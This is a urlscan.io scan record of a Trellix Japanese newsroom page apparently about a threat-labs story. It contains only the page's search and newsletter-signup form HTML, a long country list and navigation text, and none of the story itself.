www.trellix.com
Open in
urlscan Pro
2600:140b:400::172d:32f9
Public Scan
Submitted URL: https://pdt.trellix.com/e/479502/pient-ID-eid-57IL0D9Z-smcid-EM/hyx147/399041722/00Q2T00002jUJcxUAG?h=XoXZeRPiynrbfabc8I...
Effective URL: https://www.trellix.com/ja-jp/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html?contactid=00Q2T...
Submission: On March 15 via manual from JP — Scanned from JP
Effective URL: https://www.trellix.com/ja-jp/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html?contactid=00Q2T...
Submission: On March 15 via manual from JP — Scanned from JP
Form analysis 5 forms found in the DOM
<form>
<div class="input-group position-relative">
<input class="form-control custom-search-field p-2 border-0 rounded-0" placeholder="Search" aria-label="Search" id="search" data-result-path="/en-us/search.html">
<button type="button" class="btn-close position-absolute top-50 translate-middle end-0 d-none rounded-0" aria-label="Close"></button>
</div>
</form><form class="d-flex align-items-center h-100">
<div class="input-group position-relative">
<input class="form-control custom-mobile-search-field p-2 border-1 rounded-0" placeholder="Search" aria-label="Search" id="msearch" data-result-path="/en-us/search.html">
<button type="button" class="btn-close position-absolute top-50 translate-middle end-0 d-none rounded-0" aria-label="Close"></button>
</div>
<span class="custom-search-cancel">Cancel</span>
</form>https://pdtqa.trellix.com/l/346132/2022-01-06/4h5
<form class="needs-validation" novalidate="" action="https://pdtqa.trellix.com/l/346132/2022-01-06/4h5" default-campaign-code="0670HJ2E">
<div class="form-floating mb-5">
<input type="email" class="form-control" id="subscribeEmailModal" placeholder="Email" name="email" required="">
<label for="floatingInput">Email address</label>
<div class="invalid-feedback">Please enter a valid email address.</div>
</div>
<div class="form-floating mb-5">
<select class="form-control form-select" id="country" name="country" type="select" required="">
<option value="">Select Country</option>
<option data-zip="Not Required" id="Afghanistan" value="Afghanistan">Afghanistan</option>
<option data-zip="Not Required" id="Aland Islands" value="Aland Islands">Aland Islands</option>
<option data-zip="Not Required" id="Albania" value="Albania">Albania</option>
<option data-zip="Not Required" id="Algeria" value="Algeria">Algeria</option>
<option data-zip="Not Required" id="Samoa American" value="Samoa American">American Samoa</option>
<option data-zip="Not Required" id="Andorra" value="Andorra">Andorra</option>
<option data-zip="Not Required" id="Angola" value="Angola">Angola</option>
<option data-zip="Not Required" id="Anguilla" value="Anguilla">Anguilla</option>
<option data-zip="Not Required" id="Antarctica" value="Antarctica">Antarctica</option>
<option data-zip="Not Required" id="Antigua/Barbuda" value="Antigua/Barbuda">Antigua and Barbuda</option>
<option data-zip="Not Required" id="Argentina" value="Argentina">Argentina</option>
<option data-zip="Not Required" id="Armenia" value="Armenia">Armenia</option>
<option data-zip="Not Required" id="Aruba" value="Aruba">Aruba</option>
<option data-zip="Required" id="Australia" value="Australia">Australia</option>
<option data-zip="Required" id="Austria" value="Austria">Austria</option>
<option data-zip="Not Required" id="Azerbaijan" value="Azerbaijan">Azerbaijan</option>
<option data-zip="Not Required" id="Bahamas" value="Bahamas">Bahamas</option>
<option data-zip="Not Required" id="Bahrain" value="Bahrain">Bahrain</option>
<option data-zip="Not Required" id="Bangladesh" value="Bangladesh">Bangladesh</option>
<option data-zip="Not Required" id="Barbados" value="Barbados">Barbados</option>
<option data-zip="Not Required" id="Belarus" value="Belarus">Belarus</option>
<option data-zip="Required" id="Belgium" value="Belgium">Belgium</option>
<option data-zip="Not Required" id="Belize" value="Belize">Belize</option>
<option data-zip="Not Required" id="Benin" value="Benin">Benin</option>
<option data-zip="Not Required" id="Bermuda" value="Bermuda">Bermuda</option>
<option data-zip="Not Required" id="Bhutan" value="Bhutan">Bhutan</option>
<option data-zip="Not Required" id="Bolivia" value="Bolivia">Bolivia</option>
<option data-zip="Not Required" id="Bonaire" value="Bonaire">Bonaire, Sint Eustatius and Saba</option>
<option data-zip="Not Required" id="Bosnia-Herz." value="Bosnia-Herz.">Bosnia and Herzegovina</option>
<option data-zip="Not Required" id="Botswana" value="Botswana">Botswana</option>
<option data-zip="Not Required" id="Bouvet Island" value="Bouvet Island">Bouvet Island</option>
<option data-zip="Required" id="Brazil" value="Brazil">Brazil</option>
<option data-zip="Not Required" id="Brit.Ind.Oc.Ter" value="Brit.Ind.Oc.Ter">British Indian Ocean Territory</option>
<option data-zip="Not Required" id="Brunei Darussalam" value="Brunei Darussalam">Brunei Darussalam</option>
<option data-zip="Not Required" id="Bulgaria" value="Bulgaria">Bulgaria</option>
<option data-zip="Not Required" id="Burkina-Faso" value="Burkina-Faso">Burkina Faso</option>
<option data-zip="Not Required" id="Burundi" value="Burundi">Burundi</option>
<option data-zip="Not Required" id="Cape Verde" value="Cape Verde">Cabo Verde</option>
<option data-zip="Not Required" id="Cambodia" value="Cambodia">Cambodia</option>
<option data-zip="Not Required" id="Cameroon" value="Cameroon">Cameroon</option>
<option data-zip="Required" id="Canada" value="Canada">Canada</option>
<option data-zip="Not Required" id="Cayman Islands" value="Cayman Islands">Cayman Islands</option>
<option data-zip="Not Required" id="Central African Republic" value="Central African Republic">Central African Republic</option>
<option data-zip="Not Required" id="Chad" value="Chad">Chad</option>
<option data-zip="Required" id="Chile" value="Chile">Chile</option>
<option data-zip="Required" id="China" value="China">China</option>
<option data-zip="Not Required" id="Christmas Island" value="Christmas Island">Christmas Island</option>
<option data-zip="Not Required" id="Coconut Islands" value="Coconut Islands">Cocos (Keeling) Islands</option>
<option data-zip="Required" id="Colombia" value="Colombia">Colombia</option>
<option data-zip="Not Required" id="Comoros" value="Comoros">Comoros</option>
<option data-zip="Not Required" id="Congo" value="Congo">Congo</option>
<option data-zip="Not Required" id="Cook Islands" value="Cook Islands">Cook Islands</option>
<option data-zip="Not Required" id="Costa Rica" value="Costa Rica">Costa Rica</option>
<option data-zip="Not Required" id="Ivory Coast" value="Ivory Coast">Côte d'Ivoire</option>
<option data-zip="Not Required" id="Croatia" value="Croatia">Croatia</option>
<option data-zip="Not Required" id="Curacao" value="Curacao">Curaçao</option>
<option data-zip="Not Required" id="Cyprus" value="Cyprus">Cyprus</option>
<option data-zip="Not Required" id="Czech Republic" value="Czech Republic">Czechia</option>
<option data-zip="Not Required" id="Denmark" value="Denmark">Denmark</option>
<option data-zip="Not Required" id="Djibouti" value="Djibouti">Djibouti</option>
<option data-zip="Not Required" id="Dominica" value="Dominica">Dominica</option>
<option data-zip="Not Required" id="Dominican Republic" value="Dominican Republic">Dominican Republic</option>
<option data-zip="Not Required" id="Ecuador" value="Ecuador">Ecuador</option>
<option data-zip="Not Required" id="Egypt" value="Egypt">Egypt</option>
<option data-zip="Not Required" id="El Salvador" value="El Salvador">El Salvador</option>
<option data-zip="Not Required" id="Equatorial Guinea" value="Equatorial Guinea">Equatorial Guinea</option>
<option data-zip="Not Required" id="Eritrea" value="Eritrea">Eritrea</option>
<option data-zip="Not Required" id="Estonia" value="Estonia">Estonia</option>
<option data-zip="Not Required" id="Swaziland" value="Swaziland">Eswatini (previously Swaziland)</option>
<option data-zip="Not Required" id="Ethiopia" value="Ethiopia">Ethiopia</option>
<option data-zip="Not Required" id="Falkland Islnds" value="Falkland Islnds">Falkland Islands</option>
<option data-zip="Not Required" id="Faroe Islands" value="Faroe Islands">Faroe Islands</option>
<option data-zip="Not Required" id="Fiji" value="Fiji">Fiji</option>
<option data-zip="Not Required" id="Finland" value="Finland">Finland</option>
<option data-zip="Required" id="France" value="France">France</option>
<option data-zip="Not Required" id="French Guiana" value="French Guiana">French Guiana</option>
<option data-zip="Not Required" id="French Polynesia" value="French Polynesia">French Polynesia</option>
<option data-zip="Not Required" id="French Southern Territories" value="French Southern Territories">French Southern Territories</option>
<option data-zip="Not Required" id="Gabon" value="Gabon">Gabon</option>
<option data-zip="Not Required" id="Gambia" value="Gambia">Gambia</option>
<option data-zip="Not Required" id="Georgia" value="Georgia">Georgia</option>
<option data-zip="Required" id="Germany" value="Germany">Germany</option>
<option data-zip="Not Required" id="Ghana" value="Ghana">Ghana</option>
<option data-zip="Not Required" id="Gibraltar" value="Gibraltar">Gibraltar</option>
<option data-zip="Not Required" id="Greece" value="Greece">Greece</option>
<option data-zip="Not Required" id="Greenland" value="Greenland">Greenland</option>
<option data-zip="Not Required" id="Grenada" value="Grenada">Grenada</option>
<option data-zip="Not Required" id="Guadeloupe" value="Guadeloupe">Guadeloupe</option>
<option data-zip="Not Required" id="Guam" value="Guam">Guam</option>
<option data-zip="Not Required" id="Guatemala" value="Guatemala">Guatemala</option>
<option data-zip="Not Required" id="Guernsey" value="Guernsey">Guernsey</option>
<option data-zip="Not Required" id="Guinea" value="Guinea">Guinea</option>
<option data-zip="Not Required" id="Guinea-Bissau" value="Guinea-Bissau">Guinea-Bissau</option>
<option data-zip="Not Required" id="Guyana" value="Guyana">Guyana</option>
<option data-zip="Not Required" id="Haiti" value="Haiti">Haiti</option>
<option data-zip="Not Required" id="Heard and Mc Donald Islands" value="Heard and Mc Donald Islands">Heard Island and McDonald Islands</option>
<option data-zip="Not Required" id="Vatican City" value="Vatican City">Holy See (previously Vatican City State)</option>
<option data-zip="Not Required" id="Honduras" value="Honduras">Honduras</option>
<option data-zip="Not Required" id="Hong Kong" value="Hong Kong">Hong Kong</option>
<option data-zip="Not Required" id="Hungary" value="Hungary">Hungary</option>
<option data-zip="Not Required" id="Iceland" value="Iceland">Iceland</option>
<option data-zip="Required" id="India" value="India">India</option>
<option data-zip="Not Required" id="Indonesia" value="Indonesia">Indonesia</option>
<option data-zip="Not Required" id="Iraq" value="Iraq">Iraq</option>
<option data-zip="Not Required" id="Ireland" value="Ireland">Ireland</option>
<option data-zip="Not Required" id="Isle of Man" value="Isle of Man">Isle of Man</option>
<option data-zip="Not Required" id="Israel" value="Israel">Israel</option>
<option data-zip="Required" id="Italy" value="Italy">Italy</option>
<option data-zip="Not Required" id="Jamaica" value="Jamaica">Jamaica</option>
<option data-zip="Required" id="Japan" value="Japan">日本</option>
<option data-zip="Not Required" id="Jersey" value="Jersey">Jersey</option>
<option data-zip="Not Required" id="Jordan" value="Jordan">Jordan</option>
<option data-zip="Not Required" id="Kazakhstan" value="Kazakhstan">Kazakhstan</option>
<option data-zip="Not Required" id="Kenya" value="Kenya">Kenya</option>
<option data-zip="Not Required" id="Kiribati" value="Kiribati">Kiribati</option>
<option data-zip="Required" id="South Korea" value="South Korea">Korea, Republic of</option>
<option data-zip="Not Required" id="Kosovo" value="Kosovo">Kosovo</option>
<option data-zip="Not Required" id="Kuwait" value="Kuwait">Kuwait</option>
<option data-zip="Not Required" id="Kyrgyzstan" value="Kyrgyzstan">Kyrgyzstan</option>
<option data-zip="Not Required" id="Laos" value="Laos">Laos</option>
<option data-zip="Not Required" id="Latvia" value="Latvia">Latvia</option>
<option data-zip="Not Required" id="Lebanon" value="Lebanon">Lebanon</option>
<option data-zip="Not Required" id="Lesotho" value="Lesotho">Lesotho</option>
<option data-zip="Not Required" id="Liberia" value="Liberia">Liberia</option>
<option data-zip="Not Required" id="Libya" value="Libya">Libya</option>
<option data-zip="Not Required" id="Liechtenstein" value="Liechtenstein">Liechtenstein</option>
<option data-zip="Not Required" id="Lithuania" value="Lithuania">Lithuania</option>
<option data-zip="Not Required" id="Luxembourg" value="Luxembourg">Luxembourg</option>
<option data-zip="Not Required" id="Macau" value="Macau">Macao</option>
<option data-zip="Not Required" id="Macedonia" value="Macedonia">Macedonia, Republic of</option>
<option data-zip="Not Required" id="Madagascar" value="Madagascar">Madagascar</option>
<option data-zip="Not Required" id="Malawi" value="Malawi">Malawi</option>
<option data-zip="Not Required" id="Malaysia" value="Malaysia">Malaysia</option>
<option data-zip="Not Required" id="Maldives" value="Maldives">Maldives</option>
<option data-zip="Not Required" id="Mali" value="Mali">Mali</option>
<option data-zip="Not Required" id="Malta" value="Malta">Malta</option>
<option data-zip="Not Required" id="Marshall Islnds" value="Marshall Islnds">Marshall Islands</option>
<option data-zip="Not Required" id="Martinique" value="Martinique">Martinique</option>
<option data-zip="Not Required" id="Mauritania" value="Mauritania">Mauritania</option>
<option data-zip="Not Required" id="Mauritius" value="Mauritius">Mauritius</option>
<option data-zip="Not Required" id="Mayotte" value="Mayotte">Mayotte</option>
<option data-zip="Required" id="Mexico" value="Mexico">Mexico</option>
<option data-zip="Not Required" id="Micronesia" value="Micronesia">Micronesia, Federated States of</option>
<option data-zip="Not Required" id="Moldova" value="Moldova">Moldova</option>
<option data-zip="Not Required" id="Monaco" value="Monaco">Monaco</option>
<option data-zip="Not Required" id="Mongolia" value="Mongolia">Mongolia</option>
<option data-zip="Not Required" id="Montenegro" value="Montenegro">Montenegro</option>
<option data-zip="Not Required" id="Montserrat" value="Montserrat">Montserrat</option>
<option data-zip="Not Required" id="Morocco" value="Morocco">Morocco</option>
<option data-zip="Not Required" id="Mozambique" value="Mozambique">Mozambique</option>
<option data-zip="Not Required" id="Myanmar" value="Myanmar">Myanmar</option>
<option data-zip="Not Required" id="Namibia" value="Namibia">Namibia</option>
<option data-zip="Not Required" id="Nauru" value="Nauru">Nauru</option>
<option data-zip="Not Required" id="Nepal" value="Nepal">Nepal</option>
<option data-zip="Required" id="Netherlands" value="Netherlands">Netherlands</option>
<option data-zip="Not Required" id="Netherlands Antilles" value="Netherlands Antilles">Netherlands Antilles</option>
<option data-zip="Not Required" id="New Caledonia" value="New Caledonia">New Caledonia</option>
<option data-zip="Required" id="New Zealand" value="New Zealand">New Zealand</option>
<option data-zip="Not Required" id="Nicaragua" value="Nicaragua">Nicaragua</option>
<option data-zip="Not Required" id="Niger" value="Niger">Niger</option>
<option data-zip="Not Required" id="Nigeria" value="Nigeria">Nigeria</option>
<option data-zip="Not Required" id="Niue Islands" value="Niue Islands">Niue</option>
<option data-zip="Not Required" id="Norfolk Island" value="Norfolk Island">Norfolk Island</option>
<option data-zip="Not Required" id="N.Mariana Islnd" value="N.Mariana Islnd">Northern Mariana Islands</option>
<option data-zip="Not Required" id="Norway" value="Norway">Norway</option>
<option data-zip="Not Required" id="Oman" value="Oman">Oman</option>
<option data-zip="Not Required" id="Pakistan" value="Pakistan">Pakistan</option>
<option data-zip="Not Required" id="Palau" value="Palau">Palau</option>
<option data-zip="Not Required" id="Palestine State" value="Palestine State">Palestine, State of</option>
<option data-zip="Not Required" id="Panama" value="Panama">Panama</option>
<option data-zip="Not Required" id="Papua New Guinea" value="Papua New Guinea">Papua New Guinea</option>
<option data-zip="Not Required" id="Paraguay" value="Paraguay">Paraguay</option>
<option data-zip="Not Required" id="Peru" value="Peru">Peru</option>
<option data-zip="Not Required" id="Philippines" value="Philippines">Philippines</option>
<option data-zip="Not Required" id="Pitcairn Islnds" value="Pitcairn Islnds">Pitcairn</option>
<option data-zip="Required" id="Poland" value="Poland">Poland</option>
<option data-zip="Required" id="Portugal" value="Portugal">Portugal</option>
<option data-zip="Not Required" id="Puerto Rico" value="Puerto Rico">Puerto Rico</option>
<option data-zip="Not Required" id="Qatar" value="Qatar">Qatar</option>
<option data-zip="Not Required" id="Reunion" value="Reunion">Réunion</option>
<option data-zip="Not Required" id="Romania" value="Romania">Romania</option>
<option data-zip="Required" id="Russian Federation" value="Russian Federation">Russian Federation</option>
<option data-zip="Not Required" id="Rwanda" value="Rwanda">Rwanda</option>
<option data-zip="Not Required" id="St. Barthelemy" value="St. Barthelemy">Saint Barthélemy</option>
<option data-zip="Not Required" id="St. Helena" value="St. Helena">Saint Helena, Ascension and Tristan da Cunha</option>
<option data-zip="Not Required" id="Saint Kitts and Nevis" value="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option data-zip="Not Required" id="St. Lucia" value="St. Lucia">Saint Lucia</option>
<option data-zip="Not Required" id="St. Martin" value="St. Martin">Saint Martin (French part)</option>
<option data-zip="Not Required" id="St. Pierre and Miquelon" value="St. Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option data-zip="Not Required" id="St. Vincent" value="St. Vincent">Saint Vincent and the Grenadines</option>
<option data-zip="Not Required" id="Western Samoa" value="Western Samoa">Samoa (formerly Western Samoa)</option>
<option data-zip="Not Required" id="San Marino" value="San Marino">San Marino</option>
<option data-zip="Not Required" id="Sao Tome and Principe" value="Sao Tome and Principe">Sao Tome and Principe</option>
<option data-zip="Not Required" id="Saudi Arabia" value="Saudi Arabia">Saudi Arabia</option>
<option data-zip="Not Required" id="Senegal" value="Senegal">Senegal</option>
<option data-zip="Not Required" id="Serbia" value="Serbia">Serbia</option>
<option data-zip="Not Required" id="Seychelles" value="Seychelles">Seychelles</option>
<option data-zip="Not Required" id="Sierra Leone" value="Sierra Leone">Sierra Leone</option>
<option data-zip="Required" id="Singapore" value="Singapore">Singapore</option>
<option data-zip="Not Required" id="Sint Maarten" value="Sint Maarten">Sint Maarten (Dutch part)</option>
<option data-zip="Not Required" id="Slovak Republic" value="Slovak Republic">Slovakia</option>
<option data-zip="Not Required" id="Slovenia" value="Slovenia">Slovenia</option>
<option data-zip="Not Required" id="Solomon Islands" value="Solomon Islands">Solomon Islands</option>
<option data-zip="Not Required" id="Somalia" value="Somalia">Somalia</option>
<option data-zip="Not Required" id="South Africa" value="South Africa">South Africa</option>
<option data-zip="Not Required" id="S. Sandwich Ins" value="S. Sandwich Ins">South Georgia and the South Sandwich Islands</option>
<option data-zip="Not Required" id="South Sudan" value="South Sudan">South Sudan</option>
<option data-zip="Required" id="Spain" value="Spain">Spain</option>
<option data-zip="Not Required" id="Sri Lanka" value="Sri Lanka">Sri Lanka</option>
<option data-zip="Not Required" id="Suriname" value="Suriname">Suriname</option>
<option data-zip="Not Required" id="Svalbard" value="Svalbard">Svalbard and Jan Mayen</option>
<option data-zip="Required" id="Sweden" value="Sweden">Sweden</option>
<option data-zip="Required" id="Switzerland" value="Switzerland">Switzerland</option>
<option data-zip="Not Required" id="Taiwan" value="Taiwan">Taiwan</option>
<option data-zip="Not Required" id="Tajikistan" value="Tajikistan">Tajikistan</option>
<option data-zip="Not Required" id="Tanzania" value="Tanzania">Tanzania</option>
<option data-zip="Not Required" id="Thailand" value="Thailand">Thailand</option>
<option data-zip="Not Required" id="Timor-Leste" value="Timor-Leste">Timor-Leste</option>
<option data-zip="Not Required" id="Togo" value="Togo">Togo</option>
<option data-zip="Not Required" id="Tokelau Islands" value="Tokelau Islands">Tokelau</option>
<option data-zip="Not Required" id="Tonga" value="Tonga">Tonga</option>
<option data-zip="Not Required" id="Trinidad and Tobago" value="Trinidad and Tobago">Trinidad and Tobago</option>
<option data-zip="Not Required" id="Tunisia" value="Tunisia">Tunisia</option>
<option data-zip="Not Required" id="Turkey" value="Turkey">Turkey</option>
<option data-zip="Not Required" id="Turkmenistan" value="Turkmenistan">Turkmenistan</option>
<option data-zip="Not Required" id="Turks and Caicos Islands" value="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option data-zip="Not Required" id="Tuvalu" value="Tuvalu">Tuvalu</option>
<option data-zip="Required" id="USA" value="USA">USA</option>
<option data-zip="Not Required" id="Uganda" value="Uganda">Uganda</option>
<option data-zip="Not Required" id="Ukraine" value="Ukraine">Ukraine</option>
<option data-zip="Not Required" id="United Arab Emirates" value="United Arab Emirates">United Arab Emirates</option>
<option data-zip="Required" id="United Kingdom" value="United Kingdom">United Kingdom</option>
<option data-zip="Not Required" id="United States Minor Outlying" value="United States Minor Outlying">United States Minor Outlying Islands</option>
<option data-zip="Not Required" id="Uruguay" value="Uruguay">Uruguay</option>
<option data-zip="Not Required" id="Uzbekistan" value="Uzbekistan">Uzbekistan</option>
<option data-zip="Not Required" id="Vanuatu" value="Vanuatu">Vanuatu</option>
<option data-zip="Not Required" id="Venezuela" value="Venezuela">Venezuela</option>
<option data-zip="Not Required" id="Vietnam" value="Vietnam">Viet Nam</option>
<option data-zip="Not Required" id="Virgin Islands British" value="Virgin Islands British">Virgin Islands, British</option>
<option data-zip="Not Required" id="Virgin Islands U.S." value="Virgin Islands U.S.">Virgin Islands, U.S.</option>
<option data-zip="Not Required" id="Wallis and Futuna Islands" value="Wallis and Futuna Islands">Wallis and Futuna</option>
<option data-zip="Not Required" id="Western Sahara" value="Western Sahara">Western Sahara</option>
<option data-zip="Not Required" id="Yemen" value="Yemen">Yemen</option>
<option data-zip="Not Required" id="Zambia" value="Zambia">Zambia</option>
<option data-zip="Not Required" id="Zimbabwe" value="Zimbabwe">Zimbabwe</option>
</select>
<label for="country" class="form-label">Country</label>
<div class="invalid-feedback">Please select your country of residence.</div>
</div>
<div class="checkbox mb-5">
<h5>Subscription Topics</h5>
<div class="form-check">
<input type="text" class="hidden" name="threatInformation" id="threatInformation">
<input class="form-check-input" type="checkbox" checked="" id="threatInformation-vis" name="threatInformation-vis" val-sync="threatInformation">
<label for="threatInformation-vis">The latest threat alerts and information.</label>
</div>
<div class="form-check">
<input type="text" class="hidden" name="newsAndEvents" id="newsAndEvents">
<input class="form-check-input" type="checkbox" checked="" id="newsAndEvents-vis" name="newsAndEvents-vis" val-sync="newsAndEvents">
<label for="newsAndEvents-vis">News, promos, and events for you.</label>
</div>
</div>
<div class="hidden-form-grp">
<input type="text" id="campaignCode" name="campaignCode">
<input type="text" id="mid" name="mid" value="">
</div>
<div class="mb-2">
<button type="submit" class="btn btn-primary">Subscribe</button>
</div>
</form><form id="blogsSearchForm">
<div class="input-group position-relative blogssearchbox"> <input class="form-control custom-search-field p-2 border-0 rounded-0" placeholder="Search Stories" type="search" aria-label="Search" id="blogssearch"> </div>
</form><form novalidate="">
<div class="mb-0 col-12 d-flex justify-content-center mx-auto flex-column flex-md-row">
<div class="form-floating mx-0 me-md-3"> <input type="email" onchange="document.querySelector('#subscribeEmailModal').value = document.querySelector('#subscribeEmailBlade').value;" class="form-control custom-input" id="subscribeEmailBlade"
placeholder="Email" required="">
<div class="invalid-feedback text-start">有効な電子メール アドレスを入力してください。</div>
</div>
<div class="mt-3 mt-md-0"> <!-- <button class="btn btn-primary mb-0" data-bs-toggle="modal" data-bs-target="#myModal">Submit</button> --> <button class="btn btn-primary custom-submit" type="submit" onclick="event.preventDefault()"
data-bs-toggle="modal" data-bs-target="#myModal">送信</button> </div>
</div>
</form>Text Content
* Contact
Search Menu
Why Trellix?
Products
Threat Center
Newsroom
Support Partners
Cancel
Why Trellix?
Products
Threat Center
Newsroom
Support Partners Contact
Main menu
Why Trellix?
Leadership Careers
Main menu
Trellix Platform
Endpoint Security Cloud Security Collaboration Data and Users Applications
Security Infrastructure Security
Main menu
Threat Center
Threat Reports
Main menu
Newsroom
News Stories Resources
Why Trellix?
--------------------------------------------------------------------------------
Leadership Careers
Trellix Introduction
A living security platform with a pulse that is always learning and always
adapting.
XDR Solution Brief
Learn how an XDR ecosystem that's always adapting can energize your enterprise.
Trellix Platform
--------------------------------------------------------------------------------
Endpoint Security Cloud Security Collaboration Data and Users Applications
Security Infrastructure Security
Gartner MQ (Endpoint)
Download the Magic Quadrant report, which evaluates the 19 vendors based on
ability to execute and completeness of vision.
Gartner® Report: Market Guide for XDR
As per Gartner, "XDR is an emerging technology that can offer improved threat
prevention, detection and response."
Threat Center
--------------------------------------------------------------------------------
Threat Reports
CYBERATTACKS TARGETING UKRAINE & HERMETICWIPER PROTECTIONS
Analysis from the Trellix Advanced Threat Research (ATR) team of wipers deployed
in Ukraine leading to likely connection between Whispergate, and HermeticWiper.
TRELLIX THREAT REPORT: JANUARY 2022
Our new company’s first threat report features research on Log4j, prevalent
ransomware, APT tools, ATR malware data, targeted clients, customer sectors, and
MITRE ATT&CK techniques.
Newsroom
--------------------------------------------------------------------------------
News Stories Resources
MCAFEE ENTERPRISE AND FIREEYE EMERGE AS TRELLIX
Two trusted leaders in cybersecurity have come together to create a resilient
digital world.
OUR CEO ON LIVING SECURITY
Trellix CEO, Bryan Palma, explains the critical need for security that’s always
learning.
STORIES
The latest cybersecurity trends, best practices,
security vulnerabilities, and more
Subscribe
STAY UPDATED
Email address
Select Country Country* Afghanistan Aland Islands Albania Algeria American Samoa
Andorra Angola Anguilla Antarctica Antigua and Barbuda Argentina Armenia Aruba
Australia Austria Azerbaijan Bahamas Bahrain Bangladesh Barbados Belarus Belgium
Belize Benin Bermuda Bhutan Bolivia Bonaire, Sint Eustatius and Saba Bosnia and
Herzegovina Botswana Bouvet Island Brazil British Indian Ocean Territory Brunei
Darussalam Bulgaria Burkina Faso Burundi Cabo Verde Cambodia Cameroon Canada
Cayman Islands Central African Republic Chad Chile China Christmas Island Cocos
(Keeling) Islands Colombia Comoros Congo Cook Islands Costa Rica Côte d'Ivoire
Croatia Curaçao Cyprus Czechia Denmark Djibouti Dominica Dominican Republic
Ecuador Egypt El Salvador Equatorial Guinea Eritrea Estonia Eswatini (previously
Swaziland) Ethiopia Falkland Islands Faroe Islands Fiji Finland France French
Guiana French Polynesia French Southern Territories Gabon Gambia Georgia Germany
Ghana Gibraltar Greece Greenland Grenada Guadeloupe Guam Guatemala Guernsey
Guinea Guinea-Bissau Guyana Haiti Heard Island and McDonald Islands Holy See
(previously Vatican City State) Honduras Hong Kong Hungary Iceland India
Indonesia Iraq Ireland Isle of Man Israel Italy Jamaica 日本 Jersey Jordan
Kazakhstan Kenya Kiribati Korea, Republic of Kosovo Kuwait Kyrgyzstan Laos
Latvia Lebanon Lesotho Liberia Libya Liechtenstein Lithuania Luxembourg Macao
Macedonia, Republic of Madagascar Malawi Malaysia Maldives Mali Malta Marshall
Islands Martinique Mauritania Mauritius Mayotte Mexico Micronesia, Federated
States of Moldova Monaco Mongolia Montenegro Montserrat Morocco Mozambique
Myanmar Namibia Nauru Nepal Netherlands Netherlands Antilles New Caledonia New
Zealand Nicaragua Niger Nigeria Niue Norfolk Island Northern Mariana Islands
Norway Oman Pakistan Palau Palestine, State of Panama Papua New Guinea Paraguay
Peru Philippines Pitcairn Poland Portugal Puerto Rico Qatar Réunion Romania
Russian Federation Rwanda Saint Barthélemy Saint Helena, Ascension and Tristan
da Cunha Saint Kitts and Nevis Saint Lucia Saint Martin (French part) Saint
Pierre and Miquelon Saint Vincent and the Grenadines Samoa (formerly Western
Samoa) San Marino Sao Tome and Principe Saudi Arabia Senegal Serbia Seychelles
Sierra Leone Singapore Sint Maarten (Dutch part) Slovakia Slovenia Solomon
Islands Somalia South Africa South Georgia and the South Sandwich Islands South
Sudan Spain Sri Lanka Suriname Svalbard and Jan Mayen Sweden Switzerland Taiwan
Tajikistan Tanzania Thailand Timor-Leste Togo Tokelau Tonga Trinidad and Tobago
Tunisia Turkey Turkmenistan Turks and Caicos Islands Tuvalu USA Uganda Ukraine
United Arab Emirates United Kingdom United States Minor Outlying Islands Uruguay
Uzbekistan Vanuatu Venezuela Viet Nam Virgin Islands, British Virgin Islands,
U.S. Wallis and Futuna Western Sahara Yemen Zambia Zimbabwe Country
SUBSCRIPTION TOPICS
The latest threat alerts and information.
News, promos, and events for you.
Subscribe
STAY UPDATED
Email address
Please enter a valid email address.
Select Country Afghanistan Aland Islands Albania Algeria American Samoa Andorra
Angola Anguilla Antarctica Antigua and Barbuda Argentina Armenia Aruba Australia
Austria Azerbaijan Bahamas Bahrain Bangladesh Barbados Belarus Belgium Belize
Benin Bermuda Bhutan Bolivia Bonaire, Sint Eustatius and Saba Bosnia and
Herzegovina Botswana Bouvet Island Brazil British Indian Ocean Territory Brunei
Darussalam Bulgaria Burkina Faso Burundi Cabo Verde Cambodia Cameroon Canada
Cayman Islands Central African Republic Chad Chile China Christmas Island Cocos
(Keeling) Islands Colombia Comoros Congo Cook Islands Costa Rica Côte d'Ivoire
Croatia Curaçao Cyprus Czechia Denmark Djibouti Dominica Dominican Republic
Ecuador Egypt El Salvador Equatorial Guinea Eritrea Estonia Eswatini (previously
Swaziland) Ethiopia Falkland Islands Faroe Islands Fiji Finland France French
Guiana French Polynesia French Southern Territories Gabon Gambia Georgia Germany
Ghana Gibraltar Greece Greenland Grenada Guadeloupe Guam Guatemala Guernsey
Guinea Guinea-Bissau Guyana Haiti Heard Island and McDonald Islands Holy See
(previously Vatican City State) Honduras Hong Kong Hungary Iceland India
Indonesia Iraq Ireland Isle of Man Israel Italy Jamaica 日本 Jersey Jordan
Kazakhstan Kenya Kiribati Korea, Republic of Kosovo Kuwait Kyrgyzstan Laos
Latvia Lebanon Lesotho Liberia Libya Liechtenstein Lithuania Luxembourg Macao
Macedonia, Republic of Madagascar Malawi Malaysia Maldives Mali Malta Marshall
Islands Martinique Mauritania Mauritius Mayotte Mexico Micronesia, Federated
States of Moldova Monaco Mongolia Montenegro Montserrat Morocco Mozambique
Myanmar Namibia Nauru Nepal Netherlands Netherlands Antilles New Caledonia New
Zealand Nicaragua Niger Nigeria Niue Norfolk Island Northern Mariana Islands
Norway Oman Pakistan Palau Palestine, State of Panama Papua New Guinea Paraguay
Peru Philippines Pitcairn Poland Portugal Puerto Rico Qatar Réunion Romania
Russian Federation Rwanda Saint Barthélemy Saint Helena, Ascension and Tristan
da Cunha Saint Kitts and Nevis Saint Lucia Saint Martin (French part) Saint
Pierre and Miquelon Saint Vincent and the Grenadines Samoa (formerly Western
Samoa) San Marino Sao Tome and Principe Saudi Arabia Senegal Serbia Seychelles
Sierra Leone Singapore Sint Maarten (Dutch part) Slovakia Slovenia Solomon
Islands Somalia South Africa South Georgia and the South Sandwich Islands South
Sudan Spain Sri Lanka Suriname Svalbard and Jan Mayen Sweden Switzerland Taiwan
Tajikistan Tanzania Thailand Timor-Leste Togo Tokelau Tonga Trinidad and Tobago
Tunisia Turkey Turkmenistan Turks and Caicos Islands Tuvalu USA Uganda Ukraine
United Arab Emirates United Kingdom United States Minor Outlying Islands Uruguay
Uzbekistan Vanuatu Venezuela Viet Nam Virgin Islands, British Virgin Islands,
U.S. Wallis and Futuna Western Sahara Yemen Zambia Zimbabwe Country
Please select your country of residence.
SUBSCRIPTION TOPICS
The latest threat alerts and information.
News, promos, and events for you.
Subscribe
<<
ストーリー:
XDR
脅威ラボ
全体像
